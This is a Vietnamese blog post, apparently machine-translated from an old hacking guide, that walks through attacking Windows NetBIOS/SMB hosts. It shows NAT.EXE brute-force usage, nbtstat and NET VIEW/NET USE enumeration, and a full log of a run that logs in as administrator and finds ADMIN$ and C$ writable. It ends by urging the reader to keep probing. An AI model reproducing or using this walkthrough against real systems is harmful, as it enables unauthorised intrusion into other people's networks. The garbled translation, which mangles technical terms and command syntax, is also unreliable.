............. tham khảo nội bộ...............................
BẠN có thể yêu cầu bất kỳ nghi ngờ tham khảo các phần số.
Vì vậy, wid các u phần trước là thạo với NetBIOS bây giờ cho phép nhìn thấy một tin tặc tiếp cận n và làm thế nào là dễ dàng cho u là một nạn nhân.
Đây là một mục đích giáo dục chỉ
Phương pháp tấn công NetBIOS
Kỹ thuật này đã được xác minh NetBIOS tấn công trên Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 phiên bản beta 2.1. Một trong những thành phần được sử dụng là "NAT.EXEA" thảo luận của công cụ, nó bị chuyển mạch, và các kỹ thuật phổ biến sau:
NAT.EXE [-o tên file] [-u userlist] [-p passlist]
Thiết bị chuyển mạch:
-O Xác định các tập tin đầu ra. Tất cả các kết quả của quét
sẽ được ghi vào tập tin quy định, ngoài
đầu ra tiêu chuẩn.
-U ghi rõ tập tin để đọc tên người dùng từ. Tên người dùng
sẽ được đọc từ tập tin chỉ định khi cố gắng-
ing đoán mật khẩu trên máy chủ từ xa.
Tên người dùng sẽ xuất hiện mỗi dòng trong speci-
fied file.
-P Chỉ định file để đọc mật khẩu từ. Mật khẩu
sẽ được đọc từ tập tin chỉ định khi cố gắng-
ing đoán mật khẩu trên máy chủ từ xa.
Mật khẩu sẽ xuất hiện mỗi dòng trong speci-
fied file.
Địa chỉ cần được quy định tại dấu phẩy deliminated
định dạng, không có khoảng trống. Địa chỉ hợp lệ specifica-
tions bao gồm:
tên máy - "tên máy" được thêm
127.0.0.1-127.0.0.3, bổ sung thêm địa chỉ 127.0.0.1
thông qua 127.0.0.3
127.0.0.1-3, bổ sung thêm địa chỉ 127.0.0.1 qua
127.0.0.3
127.0.0.1-3,7,10-20, bổ sung thêm địa chỉ 127.0.0.1
thông qua 127.0.0.3, 127.0.0.7, 127.0.0.10 qua
127.0.0.20.
tên máy ,127.0.0.1-3, cho biết thêm "tên máy" và 127.0.0.1
thông qua 127.0.0.1
Tất cả các kết hợp của tên máy chủ và các dãy địa chỉ là
quy định trên là hợp lệ.
[8.0.1] So sánh NAT.EXE để thực thi của chính Microsoft
[8.0.2] Trước tiên, nhìn vào nbtstat
Đầu tiên chúng ta nhìn vào lệnh nbtstat. Lệnh này đã được thảo luận trong phần trước của cuốn sách ([5.0.6] Các lệnh nbtstat). Trong phần này, bạn sẽ thấy một cuộc biểu tình của công cụ này như thế nào được sử dụng và như thế nào so sánh với các công cụ Microsoft và Microsoft công cụ không.
Điều gì sau là khá nhiều một hướng dẫn từng bước để sử dụng nbtstat cũng như thông tin thêm. Một lần nữa, nếu bạn quan tâm đến nhiều thiết bị chuyển mạch NBSTAT và chức năng, xem [5.0.6] Các lệnh nbtstat phần của cuốn sách.
C: \ nbtstat-A XXX.XX.XXX.XX
NetBIOS Remote Machine Name Table
Tên Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE đăng ký
STUDENT1 <00> UNIQUE đăng ký
DOMAIN1 <00> GROUP đăng ký
DOMAIN1 <1C> GROUP đăng ký
DOMAIN1 <1B> UNIQUE đăng ký
STUDENT1 <03> UNIQUE đăng ký
DOMAIN1 <1E> GROUP đăng ký
DOMAIN1 <1D> UNIQUE đăng ký
.. __MSBROWSE__. <01> GROUP đăng ký
MAC Address = 00-C0-4F-C4-8C-9D
Đây là một NetBIOS liệt kê một phần 16 bit:
Computername <00> UNIQUE máy trạm dịch vụ tên
<00> GROUP tên miền
Server <20> UNIQUE Server Tên dịch vụ
Computername <03> UNIQUE đăng ký bởi dịch vụ messenger. Đây là computername
để được thêm vào các file LMHOSTS đó là không cần thiết phải sử dụng
NAT.EXE nhưng là cần thiết nếu bạn muốn xem từ xa
máy tính trong mạng Neighborhood.
Tên đăng nhập <03> đăng ký bởi dịch vụ messenger.
Domainname <1B> Đăng ký máy tính địa phương như là trình duyệt tổng thể cho tên miền
Domainname <1C> Đăng ký máy tính như một bộ điều khiển miền cho tên miền
(PDC hay BDC)
Domainname <1D> Đăng ký khách hàng địa phương như là trình duyệt tổng thể các phân đoạn địa phương
cho các miền
Domainname <1E> Đăng ký như là một tên NetBIOS Group
Tên
<06> RAS Server
<1F> Net DDE
<21> RAS Client
[8.0.3] Giới thiệu về các lệnh NET
Lệnh NET là một lệnh quản trị viên có thể thực hiện thông qua một cửa sổ dos để hiển thị thông tin về máy chủ, mạng, cổ phiếu, và các kết nối. Nó cũng có một số tùy chọn lệnh mà bạn có thể sử dụng để thêm tài khoản người dùng và các nhóm, thay đổi cài đặt tên miền, và cấu hình cổ phần. Trong phần này, bạn sẽ tìm hiểu về các lệnh NET, và bạn cũng sẽ có đề cương cho một tập tin NET hàng loạt lệnh có thể được sử dụng như một công cụ an ninh mạng phân tích nguyên thủy. Trước khi chúng tôi tiếp tục với các kỹ thuật, một cuộc thảo luận của các tùy chọn có sẵn sẽ đến đầu tiên:
[8.0.4] Net Tài khoản: Lệnh này cho thấy các thiết lập hiện tại cho mật khẩu, hạn chế đăng nhập, và thông tin tên miền. Nó cũng chứa các tùy chọn cho việc cập nhật tài khoản người dùng cơ sở dữ liệu và sửa đổi mật khẩu và đăng nhập yêu cầu.
[8.0.5] Net Máy tính: này thêm hoặc xóa các máy tính từ một cơ sở dữ liệu lĩnh vực.
[8.0.6] Net Config Server hoặc cấu hình máy trạm Net: Hiển thị thông tin về cấu hình dịch vụ máy chủ. Khi được sử dụng mà không có chỉ định máy chủ hoặc máy trạm, lệnh sẽ hiển thị một danh sách các dịch vụ cấu hình.
[8.0.7] Net Tiếp tục: Reactivates một dịch vụ NT đã được đình chỉ bằng một lệnh PAUSE NET.
[8.0.8] Net Tập tin: Lệnh này liệt kê những tập tin mở trên máy chủ và có các tùy chọn để đóng các tập tin được chia sẻ và loại bỏ các khóa tập tin.
[8.0.9] Net Group: Điều này sẽ hiển thị thông tin về tên nhóm và có các tùy chọn bạn có thể sử dụng thêm hoặc sửa đổi các nhóm toàn cầu trên các máy chủ.
[8.1.0] Net Help: Trợ giúp với các lệnh này
[8.1.1] Net Helpmsg tin #: Nhận trợ giúp với một lỗi mạng hay tin nhắn chức năng.
[8.1.2] Net localgroup: Sử dụng danh sách các nhóm địa phương trên các máy chủ. Bạn cũng có thể sửa đổi các nhóm.
[8.1.3] Net Tên: lệnh này sẽ hiển thị tên của máy tính và người sử dụng mà thông tin được gửi trên máy tính.
[8.1.4] Net Pause: Sử dụng lệnh này để đình chỉ một dịch vụ NT nhất định.
[8.1.5] Net In: Hiển thị các hàng đợi công việc in ấn và chia sẻ.
[8.1.6] Net Gởi: Sử dụng lệnh này để gửi tin nhắn cho người sử dụng khác, máy tính, hoặc tên nhắn tin trên mạng.
[8.1.7] Net Session: Hiển thị thông tin về phiên hiện tại. Ngoài ra có các lệnh cho ngắt kết nối buổi nhất định.
[8.1.8] Net Chia sẻ: Sử dụng lệnh này để thông tin danh sách về tất cả các tài nguyên được chia sẻ trên máy tính. Lệnh này cũng được sử dụng để tạo ra mạng lưới cổ phần.
[8.1.9] Net Thống kê Server hay Workstation: Hiển thị các số liệu thống kê log.
[8.2.0] Net Stop: Dừng dịch vụ NT, huỷ bỏ bất kỳ kết nối các dịch vụ đang sử dụng. Hãy để nó được biết đến là dừng một dịch vụ, có thể ngừng các dịch vụ khác.
[8.2.1] Net Thời gian: lệnh này được sử dụng để hiển thị hoặc đặt thời gian cho một máy tính hoặc miền.
[8.2.2] Net Sử dụng: Điều này sẽ hiển thị một danh sách các máy tính kết nối và có các tùy chọn để kết nối và ngắt kết nối từ các tài nguyên chia sẻ.
[8.2.3] Net User: Lệnh này sẽ hiển thị một danh sách các tài khoản người dùng cho máy tính, và có các tùy chọn cho việc tạo ra một thay đổi các tài khoản.
[8.2.4] Net Xem: lệnh này sẽ hiển thị một danh sách các tài nguyên được chia sẻ trên máy tính. Bao gồm các máy chủ NetWare.
[8.2.5] đặc biệt lưu ý trên DOS và Windows cũ hơn máy: Các lệnh được liệt kê ở trên có sẵn cho Windows NT máy chủ và máy trạm, DOS và Windows cũ hơn khách hàng đã NET các lệnh sẵn có:
Net Config
Net diag (chạy chương trình chẩn đoán)
Net Trợ giúp
Net Init (tải giao thức và trình điều khiển card mạng.)
Net Logoff
Net Logon
Net Mật khẩu (thay đổi mật khẩu)
Net In
Net Bắt đầu
Net Stop
Net Thời gian
Net sử dụng
Net Ver (hiển thị các loại và phiên bản của Redirector mạng)
Net View
Đối với phần này, các lệnh được sử dụng là NET VIEW NET và sử dụng lệnh.
[8.2.6] Thực tế NET VIEW và NET sử dụng màn hình chụp trong một hack.
C: \ net view XXX.XX.XXX.XX
Chia sẻ nguồn tài nguyên ở XXX.XX.XXX.XX
Chia sẻ Loại tên Được sử dụng làm luận
-------------------------------------------------- ----------------------------
Netlogon Disk Logon máy chủ chia sẻ
Kiểm tra Disk
Lệnh thành công.
Chú ý: C $ ADMIN $ và IPC $ là ẩn và không được hiển thị.
C: \ net sử dụng /?
Cú pháp của lệnh này là:
NET USE [devicename | *] [\ \ computername \ sharename [\ khối lượng] password [| *]]
[/ USER: [domainname \] tên người dùng]
[[/ DELETE] | [/ dai dẳng: {YES | NO}]]
NET USE [devicename | *] [mật khẩu | *]] [/ TRANG CHỦ]
NET USE [/ dai dẳng: {YES | NO}]
C: \ net sử dụng x: \ \ XXX.XX.XXX.XX \ test
Lệnh thành công.
C: \ giải nén \ nat10bin> net sử dụng
kết nối mới sẽ được ghi nhớ.
Tình trạng địa phương từ xa mạng
-------------------------------------------------- -----------------------------
OK X: \ \ XXX.XX.XXX.XX \ test Microsoft Windows Network
OK \ \ XXX.XX.XXX.XX \ test Microsoft Windows Network
Lệnh thành công.
Dưới đây là một ví dụ thực tế của chương trình như thế nào NAT.EXE được sử dụng. Các thông tin được liệt kê ở đây là một nắm bắt thực tế của hoạt động này. Các địa chỉ IP đã được thay đổi để bảo vệ, tốt, chúng ta.
C: \ nat-o output.txt-u-p passlist.txt userlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Đọc tên người dùng từ userlist.txt
Đọc [*]--- mật khẩu từ passlist.txt
[*]--- Kiểm tra máy: XXX.XX.XXX.XX
[*]--- Lấy danh sách các tên NetBIOS từ xa
[*]--- Cố gắng để kết nối với tên: *
[*]--- Không thể kết nối
[*]--- Cố gắng để kết nối với tên: * SMBSERVER
[*]--- LIÊN với tên: * SMBSERVER
[*]--- Cố gắng để kết nối với giao thức: MICROSOFT MẠNG 1,03
[*]--- Server thời gian là 7:44:34 Môn ngày 01 tháng 12 năm 1997
[*]--- Múi giờ là UTC-6,0
[*]--- Máy chủ từ xa muốn chúng ta để mã hóa, nói cho nó không
[*]--- Cố gắng để kết nối với tên: * SMBSERVER
[*]--- LIÊN với tên: * SMBSERVER
[*]--- Cố gắng để thiết lập phiên
[*]--- Đã không thể thiết lập mật khẩu không có phiên
[*]--- Cố gắng để kết nối với người dùng: `'Password:' mật khẩu 'quản trị viên
[*]--- LIÊN: Tên: `quản trị 'Password:' mật khẩu '
[*]--- Thu được máy chủ thông tin:
Server = [STUDENT1] User = [] Workgroup = [DOMAIN1] Domain = []
[*]--- Thu được niêm yết cổ phiếu:
Loại Sharename luận
--------- ---- -------
ADMIN $ Disk: Remote Admin
C $ Disk: Default chia sẻ
IPC $ IPC: Remote IPC
Netlogon Disk: Đăng nhập máy chủ chia sẻ
Test đĩa:
[*]--- Máy này có một trình duyệt danh sách:
Server luận
------- ---------
STUDENT1
[*]--- Cố gắng để truy cập chia sẻ: \ \ * SMBSERVER \
[*]--- Không thể truy cập
[*]--- Cố gắng để truy cập chia sẻ: \ \ * SMBSERVER \ ADMIN $
[*]--- CẢNH BÁO: Có khả năng truy cập chia sẻ: \ \ SMBSERVER * \ ADMIN $
Kiểm tra [*]--- ghi trong: \ \ SMBSERVER * \ ADMIN $
[*]--- Chú ý: Thư mục là khả năng ghi: \ \ * SMBSERVER \ ADMIN $
[*]--- Cố gắng để thực hiện .. lỗi về: \ \ * SMBSERVER \ ADMIN $
[*]--- Cố gắng để truy cập chia sẻ: \ \ * SMBSERVER \ C $
[*]--- CẢNH BÁO: Có khả năng truy cập chia sẻ: \ \ * SMBSERVER \ C $
Kiểm tra [*]--- ghi trong: \ \ SMBSERVER * \ C $
[*]--- Chú ý: Thư mục là khả năng ghi: \ \ * SMBSERVER \ C $
[*]--- Cố gắng để thực hiện .. lỗi về: \ \ * SMBSERVER \ C $
[*]--- Cố gắng để truy cập chia sẻ: \ \ * SMBSERVER \ netlogon
[*]--- CẢNH BÁO: Có khả năng truy cập chia sẻ: \ \ * SMBSERVER \ netlogon
Kiểm tra [*]--- ghi trong: \ \ * SMBSERVER \ netlogon
[*]--- Cố gắng để thực hiện .. lỗi về: \ \ * SMBSERVER \ netlogon
[*]--- Cố gắng để truy cập chia sẻ: \ \ * SMBSERVER \ Test
[*]--- CẢNH BÁO: Có khả năng truy cập chia sẻ: \ \ * SMBSERVER \ Test
Kiểm tra [*]--- ghi trong: \ \ * SMBSERVER \ Test
[*]--- Cố gắng để thực hiện .. lỗi về: \ \ * SMBSERVER \ Test
[*]--- Cố gắng để truy cập chia sẻ: \ \ * SMBSERVER \ D $
[*]--- Không thể truy cập
[*]--- Cố gắng để truy cập chia sẻ: \ \ * SMBSERVER \ ROOT
[*]--- Không thể truy cập
[*]--- Cố gắng để truy cập chia sẻ: \ \ * SMBSERVER \ WINNT $
[*]--- Không thể truy cập
Nếu chia sẻ mặc định của tất cả mọi người / Full Control được kích hoạt, sau đó bạn đã làm xong, máy chủ là bị hack. Nếu không, tiếp tục chơi. Bạn sẽ ngạc nhiên những gì bạn tìm hiểu.
Không có nhận xét nào:
Đăng nhận xét